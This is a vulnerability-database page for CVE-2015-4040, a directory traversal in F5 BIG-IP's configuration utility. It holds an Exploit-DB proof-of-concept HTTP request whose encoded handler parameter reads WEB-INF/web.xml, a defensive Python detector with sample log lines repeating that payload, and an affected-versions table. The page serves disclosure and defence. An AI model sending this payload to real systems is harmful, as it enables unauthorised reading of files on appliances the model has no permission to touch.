CVE-2015-4040
Description
Directory traversal vulnerability in the configuration utility in F5 BIG-IP before 12.0.0 and Enterprise Manager 3.0.0 through 3.1.1 allows remote authenticated users to access arbitrary files in the web root via unspecified vectors.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal
# Exploit Title: [F5 BigIP File Path Traversal Vulnerability]
# Discovered by: Karn Ganeshen
# Reported on: April 27, 2015
# New version released on: September 01, 2015
# Vendor Homepage: [www.f5.com]
# Version Reported: [F5 BIG-IP 10.2.4 Build 595.0 Hotfix HF3]
# CVE-2015-4040 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4040]
# Multiple Additional F5 products & versions are Affected and documented here:
https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html
*Vulnerability Details*
The handler parameter is vulnerable to file path manipulation attacks. When we submit a payload */tmui/locallb/virtual_server/../../../../WEB-INF/web.xml* in the *handler* parameter, the file *WEB-INF/web.xml* is returned.
*PoC:*
```http
POST /tmui/Control/form HTTP/1.1
Host: <IP>
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp?&FilterBy=status_availability&Filter=2
Content-Type: application/x-www-form-urlencoded
Content-Length: 1004
Cookie: JSESSIONID=3211A73547444840255BAF39984E7E3F; BIGIPAuthUsernameCookie=admin; BIGIPAuthCookie=9B1099DD8A936DDBD58606DA3B5BABC7E82C43A5; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/locallb/virtual_server/list.jsp?&"; f5_refreshpage="https%3A//<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp"; f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay=""

_timenow=Fri+Apr+24+14%3a48%3a38+EST+2015&_bufvalue_before=6hU2%2fMbRfPe7OHQ7VVc7TEffOpg%3d&exit_page=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&search_input=*&search_button_before=Search&_timeno
...[SNIP]...
fore=&enableObjList_before=&exit_page_before=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&row_count=0&_bufvalue_validation=NO_VALIDATION&disable_before=Disable&exit_button_before=Create...&handler=%2ftmui%2flocallb%2fvirtual_server%2f..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml
```
*Web.xml is returned in the Response:*
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE web-app
PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN"
"http://java.sun.com/j2ee/dtds/web-app_2_2.dtd">
<!--Automatically created by Tomcat JspC.--><web-app>
...[config file output redacted here]...
```
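A defensive check for the flaw the advisory above describes, as an added example that is not from the advisory, Exploit-DB or F5: it canonicalises a handler-style path parameter before the prefix check, so encoded `..%2f` sequences cannot reach `WEB-INF`, and flags request-log lines whose value would escape the application tree. The `/tmui/` prefix, the log line format and the sample lines are assumptions.

```python
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

ALLOWED_PREFIX = "/tmui/"      # assumed: the only tree the handler parameter may name
FORBIDDEN_SEGMENT = "WEB-INF"  # servlet-container metadata, never served to clients


def resolve_handler(handler: str) -> Optional[str]:
    """Canonical path for a handler value, or None if it escapes ALLOWED_PREFIX.

    The value is percent-decoded (twice, to catch %252e-style double encoding)
    and then normalised with posixpath so that '..' segments collapse *before*
    the prefix check. A prefix check on the raw string would accept the PoC
    value, because it begins with /tmui/locallb/virtual_server/.
    """
    decoded = unquote(unquote(handler))
    if "\x00" in decoded:                       # NUL byte: reject outright
        return None
    candidate = posixpath.normpath("/" + decoded.lstrip("/"))
    if not candidate.startswith(ALLOWED_PREFIX):
        return None
    if any(seg.upper() == FORBIDDEN_SEGMENT for seg in candidate.split("/")):
        return None
    return candidate


HANDLER_RE = re.compile(r'(?:^|[&?\s"])handler=([^&\s"]*)')


def suspicious_handler_values(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, decoded_value) for lines whose handler= value is rejected."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = HANDLER_RE.search(line)
        if m and resolve_handler(m.group(1)) is None:
            hits.append((n, unquote(unquote(m.group(1)))))
    return hits


# Constructed request-log lines for the demonstration; not real BIG-IP logs.
SAMPLE_LOG = [
    '10.0.0.5 admin "POST /tmui/Control/form" body="row_count=0&handler=%2ftmui%2flocallb%2fvirtual_server%2flist.jsp"',
    '10.0.0.9 admin "POST /tmui/Control/form" body="row_count=0&handler=%2ftmui%2flocallb%2fvirtual_server%2f..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml"',
]

if __name__ == "__main__":
    for n, value in suspicious_handler_values(SAMPLE_LOG):
        print(f"line {n}: handler resolves outside {ALLOWED_PREFIX}: {value}")
```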
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| f5 | enterprise_manager | 3.0.0 | |
| f5 | enterprise_manager | 3.1.0 | |
| f5 | enterprise_manager | 3.1.1 | |
| f5 | big-ip_access_policy_manager | <= 11.6.0 | |
| f5 | big-ip_advanced_firewall_manager | <= 11.6.0 | |
| f5 | big-ip_analytics | <= 11.6.0 | |
| f5 | big-ip_application_acceleration_manager | <= 11.6.0 | |
| f5 | big-ip_application_security_manager | <= 11.6.0 | |
| f5 | big-ip_edge_gateway | <= 11.3.0 | |
| f5 | big-ip_global_traffic_manager | <= 11.3.0 | |
| f5 | big-ip_link_controller | <= 11.3.0 | |
| f5 | big-ip_local_traffic_manager | <= 11.6.0 | |
| f5 | big-ip_policy_enforcement_manager | <= 11.3.0 | |
| f5 | big-ip_protocol_security_module | <= 11.3.0 | |
| f5 | big-ip_wan_optimization_manager | <= 11.3.0 | |
| f5 | big-ip_webaccelerator | <= 11.3.0 | |
References
- http://packetstormsecurity.com/files/133931/F5-BigIP-10.2.4-Build-595.0-HF3-Path-Traversal.html
- http://www.securitytracker.com/id/1033532
- http://www.securitytracker.com/id/1033533
- https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html
CWEs
CWE-22